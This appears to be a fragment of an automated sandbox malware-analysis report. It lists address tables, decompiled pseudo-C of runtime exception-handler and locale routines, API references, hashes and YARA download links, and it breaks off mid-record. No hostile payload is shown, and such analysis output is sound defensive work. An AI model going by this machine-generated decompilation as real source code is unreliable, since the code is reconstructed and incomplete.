0x6e0c25ab
0x6e0c25ab
0x6e0c25ac
0x6e0c25ac
0x00000000
0x6e0c2594
0x6e0c2594
0x6e0c2594
0x6e0c259d
0x6e0c259e
0x6e0c25a0
0x6e0c25a2
0x6e0c25a2
0x00000000
0x6e0c2594
0x6e0c2592
0x6e0c256e
0x6e0c2575
0x6e0c2575
0x6e0c2577
0x00000000
0x00000000
0x6e0c2579
0x6e0c257a
0x6e0c257d
0x6e0c257f
0x00000000
0x00000000
0x00000000
0x6e0c257f
0x00000000
0x6e0c2575
0x6e0c24f8
0x6e0c24fb
0x6e0c2500
0x00000000
0x00000000
0x6e0c2509
0x6e0c250b
0x6e0c2511
0x00000000
0x00000000
0x6e0c2517
0x6e0c251d
0x00000000
0x00000000
0x6e0c2523
0x6e0c2525
0x6e0c252e
0x6e0c2532
0x00000000
0x00000000
0x6e0c2538
0x6e0c253b
0x6e0c253d
0x00000000
0x00000000
0x6e0c2544
0x6e0c2546
0x00000000
0x00000000
0x6e0c2548
0x6e0c254c
0x00000000
0x00000000
0x00000000
0x6e0c254c
0x00000000
0x00000000
0x00000000
0x6e0c2437
0x6e0c2437
0x6e0c2437
0x6e0c243e
0x00000000
0x00000000
0x6e0c2440
0x6e0c2441
0x6e0c2443
0x00000000
0x00000000
0x00000000
0x6e0c2443
0x6e0c246b
0x6e0c246d
0x00000000
0x00000000
0x6e0c247d
0x6e0c247f
0x6e0c2481
0x00000000
0x00000000
0x6e0c2487
0x6e0c248e
0x6e0c24ba
0x6e0c24ba
0x6e0c24bc
0x6e0c24be
0x6e0c24d2
0x6e0c24d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e0c24c0
0x6e0c24c0
0x6e0c24c0
0x6e0c24c9
0x6e0c24ca
0x6e0c24cc
0x6e0c24ce
0x6e0c24ce
0x00000000
0x6e0c24c0
0x6e0c2490
0x6e0c2493
0x6e0c2495
0x6e0c24a7
0x6e0c24a7
0x6e0c24aa
0x6e0c24ac
0x6e0c24ac
0x6e0c24ad
0x6e0c24ad
0x6e0c24b3
0x00000000
0x00000000
0x00000000
0x00000000
0x6e0c2497
0x6e0c2497
0x6e0c2497
0x6e0c249e
0x00000000
0x00000000
0x6e0c24a0
0x6e0c24a0
0x6e0c24a1
0x00000000
0x00000000
0x00000000
0x6e0c24a1
0x6e0c24a3
0x6e0c24a5
0x6e0c24b8
0x00000000
0x00000000
0x00000000
0x6e0c24b8
0x00000000
0x6e0c24a5
0x6e0c2417
0x6e0c241a
0x6e0c241d
0x00000000
0x00000000
0x6e0c241f
0x6e0c2421
0x00000000
0x00000000
0x00000000
0x6e0c2421
0x6e0c23e6
0x6e0c23e8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E0C2456

Memory Dump Source

Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 03581c44e442ac06842356860651c5946b8298d0283736c6146b9051fba1829c
Instruction ID: 6400ac15503ae59ace1dcc1bbec503436a554a746a77a3604d9e1f446f5115a2
Opcode Fuzzy Hash: 03581c44e442ac06842356860651c5946b8298d0283736c6146b9051fba1829c
Instruction Fuzzy Hash: 2B61D130614E06DFDB59CEA9C8A075E33F5FB4AF94B21A428D856C7A84F770D8828752

Uniqueness

Uniqueness Score: -1.00%

Function 00BBB301, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BBB301(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xbbd2e0; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xbbd328 = 1;
										__eflags =  *0xbbd328;
										if( *0xbbd328 != 0) {
											goto L60;
										}
										_t84 =  *0xbbd2e0; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xbbd328 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xbbd2e0 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xbbd2e8 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xbbd2e4 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xbbd2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xbbd2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xbbd328 = 1;
							__eflags =  *0xbbd328;
							if( *0xbbd328 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xbbd2e8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xbbd2e8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xbbd328 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xbbd2e8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xbbd2e0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xbbd2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xbbd2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x00bbb30b
0x00bbb30e
0x00bbb314
0x00bbb332
0x00000000
0x00bbb332
0x00bbb31c
0x00bbb325
0x00bbb32b
0x00bbb33a
0x00bbb33d
0x00bbb340
0x00bbb34a
0x00bbb34a
0x00bbb34c
0x00bbb34f
0x00bbb351
0x00bbb351
0x00bbb353
0x00bbb356
0x00000000
0x00000000
0x00bbb358
0x00bbb35a
0x00bbb3c0
0x00bbb3c0
0x00bbb51e
0x00000000
0x00bbb51e
0x00bbb35c
0x00bbb35c
0x00bbb360
0x00bbb362
0x00bbb362
0x00bbb362
0x00bbb362
0x00bbb365
0x00bbb366
0x00bbb369
0x00bbb369
0x00bbb36d
0x00bbb371
0x00bbb37f
0x00bbb37f
0x00bbb387
0x00bbb38d
0x00bbb38f
0x00bbb391
0x00bbb3a1
0x00bbb3ae
0x00bbb3b2
0x00bbb3b7
0x00bbb3b9
0x00bbb437
0x00bbb437
0x00bbb3bb
0x00bbb3bb
0x00bbb3bb
0x00bbb439
0x00bbb43b
0x00bbb51c
0x00bbb51c
0x00000000
0x00bbb441
0x00bbb441
0x00bbb448
0x00000000
0x00000000
0x00bbb44e
0x00bbb452
0x00bbb4ae
0x00bbb4b0
0x00bbb4b8
0x00bbb4ba
0x00bbb4bc
0x00000000
0x00000000
0x00bbb4be
0x00bbb4c4
0x00bbb4c6
0x00bbb4c8
0x00bbb4dd
0x00bbb4dd
0x00bbb4df
0x00bbb50e
0x00bbb515
0x00000000
0x00bbb515
0x00bbb4e3
0x00bbb4e4
0x00bbb4e6
0x00bbb4e8
0x00bbb4e8
0x00bbb4ea
0x00bbb4ec
0x00bbb4ee
0x00bbb502
0x00bbb502
0x00bbb505
0x00bbb507
0x00bbb507
0x00bbb508
0x00bbb508
0x00000000
0x00bbb4f0
0x00bbb4f0
0x00bbb4f0
0x00bbb4f9
0x00bbb4fa
0x00bbb4fc
0x00bbb4fe
0x00bbb4fe
0x00000000
0x00bbb4f0
0x00bbb4ee
0x00bbb4ca
0x00bbb4d1
0x00bbb4d1
0x00bbb4d3
0x00000000
0x00000000
0x00bbb4d5
0x00bbb4d6
0x00bbb4d9
0x00bbb4db
0x00000000
0x00000000
0x00000000
0x00bbb4db
0x00000000
0x00bbb4d1
0x00bbb454
0x00bbb457
0x00bbb45c
0x00000000
0x00000000
0x00bbb465
0x00bbb467
0x00bbb46d
0x00000000
0x00000000
0x00bbb473
0x00bbb479
0x00000000
0x00000000
0x00bbb47f
0x00bbb481
0x00bbb48a
0x00bbb48e
0x00000000
0x00000000
0x00bbb494
0x00bbb497
0x00bbb499
0x00000000
0x00000000
0x00bbb4a0
0x00bbb4a2
0x00000000
0x00000000
0x00bbb4a4
0x00bbb4a8
0x00000000
0x00000000
0x00000000
0x00bbb4a8
0x00000000
0x00000000
0x00000000
0x00bbb393
0x00bbb393
0x00bbb393
0x00bbb39a
0x00000000
0x00000000
0x00bbb39c
0x00bbb39d
0x00bbb39f
0x00000000
0x00000000
0x00000000
0x00bbb39f
0x00bbb3c7
0x00bbb3c9
0x00000000
0x00000000
0x00bbb3d9
0x00bbb3db
0x00bbb3dd
0x00000000
0x00000000
0x00bbb3e3
0x00bbb3ea
0x00bbb416
0x00bbb416
0x00bbb418
0x00bbb41a
0x00bbb42e
0x00bbb430
0x00000000
0x00000000
0x00000000
0x00000000
0x00bbb41c
0x00bbb41c
0x00bbb41c
0x00bbb425
0x00bbb426
0x00bbb428
0x00bbb42a
0x00bbb42a
0x00000000
0x00bbb41c
0x00bbb3ec
0x00bbb3ec
0x00bbb3ef
0x00bbb3f1
0x00bbb403
0x00bbb403
0x00bbb406
0x00bbb408
0x00bbb408
0x00bbb409
0x00bbb409
0x00bbb40f
0x00bbb40f
0x00000000
0x00000000
0x00000000
0x00000000
0x00bbb3f3
0x00bbb3f3
0x00bbb3f3
0x00bbb3fa
0x00000000
0x00000000
0x00bbb3fc
0x00bbb3fc
0x00bbb3fd
0x00000000
0x00000000
0x00000000
0x00bbb3fd
0x00bbb3ff
0x00bbb401
0x00bbb414
0x00000000
0x00000000
0x00000000
0x00bbb414
0x00000000
0x00bbb401
0x00bbb373
0x00bbb376
0x00bbb379
0x00000000
0x00000000
0x00bbb37b
0x00bbb37d
0x00000000
0x00000000
0x00000000
0x00bbb37d
0x00bbb342
0x00bbb344
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00BBB3B2

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 80b8c0e5174dd27b82b2dd8b21b3bda393d0f9c65f225310dd4fa3f08df71175
Instruction ID: 482ad277423ea2f96337f6e830a8b14f89c5352de48e8247f4e9bc6598bf868f
Opcode Fuzzy Hash: 80b8c0e5174dd27b82b2dd8b21b3bda393d0f9c65f225310dd4fa3f08df71175
Instruction Fuzzy Hash: 546190316006469FDB29CF29C8A0EB973E5FB95314F2885B9D846C7292E7F5DC42CA48

Uniqueness

Uniqueness Score: -1.00%

Function 6E106700, Relevance: 1.6, Strings: 1, Instructions: 342COMMON

Download Yara Rule

Strings

,, xrefs: 6E1069D2

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: b15b6f0ad478087d7346898df292f0c14307cc8149543b582bfe25f923e86340
Instruction ID: 64a37c59388c8770a79777ee26dbea5fcd2dcfaed08a5e098289d8afddae9298
Opcode Fuzzy Hash: b15b6f0ad478087d7346898df292f0c14307cc8149543b582bfe25f923e86340
Instruction Fuzzy Hash: CCF16D74A00904DFCB28DF7CC690A5CBBF2FB8AB04B24C96AD58997354D6309987EF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E111A40, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(Function_00041A2C,00000001), ref: 6E111A6E

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: ed0064fa37d1dbdaa743b107c38bc6ca6faa58b466d5d0531ff0d91c0b9aeb6e
Instruction ID: 6b1486e3a27db0e79af9d29660322f8a265f633edcc663b94cc2dbb807d0b8ce
Opcode Fuzzy Hash: ed0064fa37d1dbdaa743b107c38bc6ca6faa58b466d5d0531ff0d91c0b9aeb6e
Instruction Fuzzy Hash: 2CE04631214608EFDF42DFE0FC09F9A3BA6BB85310F10D410F6188A554C3B1A4A0EF64

Uniqueness

Uniqueness Score: -1.00%

Function 6E111AC6, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,6E10AA6F,?,?,?,00000002,?,00000000,00000000), ref: 6E111AED

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 54ac03ed75f7f3fd128b32ea33fd07413a254e927cf324f684f800f5b096f90c
Instruction ID: 4255f8be799ac4e1cb9ad599de3bf066a3151cf6aaf2dc87376e830dbe0c179c
Opcode Fuzzy Hash: 54ac03ed75f7f3fd128b32ea33fd07413a254e927cf324f684f800f5b096f90c
Instruction Fuzzy Hash: 30D01732004149BF8F01DFE1ED0ACAA3F69FB09324B008801F91885010DA32A460AB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E111090, Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 6E111096

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: be258b4b9a096a301e1053c51fcfb1ef559e7e7507d7796f76e3b43f36dd597a
Instruction ID: 5ae327eb10a90696609413dea50d616267d7977f8f56aa0c89eaf3ff69fc7848
Opcode Fuzzy Hash: be258b4b9a096a301e1053c51fcfb1ef559e7e7507d7796f76e3b43f36dd597a
Instruction Fuzzy Hash: 56A0123000010CFBCE111A42DC058487F2CD7011507008010F40C040119B3254505594

Uniqueness

Uniqueness Score: -1.00%

Function 6E10B830, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(6E10A231,6E13B488,00000008,6E10A407,?,00000001,?,6E13B4A8,0000000C,6E10A3A6,?,00000001,?), ref: 6E10B830

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 97dc81cf01b42eee5476ae05ff3c2dba343989a16a3c12040d119f8cddd600bb
Instruction ID: a9158cf0ce41e537d4c4379f3abc188219aeaf2e21a1e664bab27617be840290
Opcode Fuzzy Hash: 97dc81cf01b42eee5476ae05ff3c2dba343989a16a3c12040d119f8cddd600bb
Instruction Fuzzy Hash: 3FB012B0302A028B9F099B3D9E2910D35E87B0920230480BD7103CA1C0DF20C450EF04

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C2184, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6E0C2184(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6E0C22EB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6E0C23A5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6E0C2290(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6E0C22EB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6E0C2387(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6e0c2188
0x6e0c2189
0x6e0c218a
0x6e0c218d
0x6e0c218f
0x6e0c2192
0x6e0c2193
0x6e0c2195
0x6e0c2196
0x6e0c2197
0x6e0c219a
0x6e0c21a4
0x6e0c2255
0x6e0c225c
0x6e0c2265
0x6e0c21aa
0x6e0c21aa
0x6e0c21b0
0x6e0c21b6
0x6e0c21b9
0x6e0c21bc
0x6e0c21c0
0x6e0c21c5
0x6e0c21ca
0x6e0c224a
0x00000000
0x6e0c21cc
0x6e0c21cc
0x6e0c21d8
0x6e0c21da
0x6e0c2235
0x6e0c2235
0x6e0c223b
0x00000000
0x6e0c21dc
0x6e0c21eb
0x6e0c21ed
0x6e0c21ee
0x6e0c21ef
0x6e0c21f2
0x6e0c21f2
0x6e0c21f4
0x00000000
0x6e0c21f6
0x6e0c21f6
0x6e0c2240
0x6e0c21f8
0x6e0c21f8
0x6e0c21fc
0x6e0c2204
0x6e0c2209
0x6e0c220e
0x6e0c221a
0x6e0c2222
0x6e0c2229
0x6e0c222f
0x6e0c2233
0x00000000
0x6e0c2233
0x6e0c21f6
0x6e0c21f4
0x00000000
0x6e0c21da
0x6e0c224e
0x6e0c224e
0x6e0c224e
0x6e0c21ca
0x6e0c226a
0x6e0c2271

Memory Dump Source

Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: b6c8464671c10761da099252a234ca5a3faf1723045cf25251906089e80cc087
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 4021D672900605AFD700DFA8DC80AAFF7A9FF59750B058468DD598B245DB30FA15CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00BBB0DC, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00BBB0DC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00BBB247(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00BBB301(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00BBB1EC(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00BBB247(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00BBB2E3(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x00bbb0e0
0x00bbb0e1
0x00bbb0e2
0x00bbb0e5
0x00bbb0e7
0x00bbb0ea
0x00bbb0eb
0x00bbb0ed
0x00bbb0ee
0x00bbb0ef
0x00bbb0f2
0x00bbb0fc
0x00bbb1ad
0x00bbb1b4
0x00bbb1bd
0x00bbb102
0x00bbb102
0x00bbb108
0x00bbb10e
0x00bbb111
0x00bbb114
0x00bbb118
0x00bbb11d
0x00bbb122
0x00bbb1a2
0x00000000
0x00bbb124
0x00bbb124
0x00bbb130
0x00bbb132
0x00bbb18d
0x00bbb18d
0x00bbb193
0x00000000
0x00bbb134
0x00bbb143
0x00bbb145
0x00bbb146
0x00bbb147
0x00bbb14a
0x00bbb14a
0x00bbb14c
0x00000000
0x00bbb14e
0x00bbb14e
0x00bbb198
0x00bbb150
0x00bbb150
0x00bbb154
0x00bbb15c
0x00bbb161
0x00bbb166
0x00bbb172
0x00bbb17a
0x00bbb181
0x00bbb187
0x00bbb18b
0x00000000
0x00bbb18b
0x00bbb14e
0x00bbb14c
0x00000000
0x00bbb132
0x00bbb1a6
0x00bbb1a6
0x00bbb1a6
0x00bbb122
0x00bbb1c2
0x00bbb1c9

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: ec3a1c1e926618b6fe82a6e20553271d3eda018e79c142e8747b23a8adf4a9d5
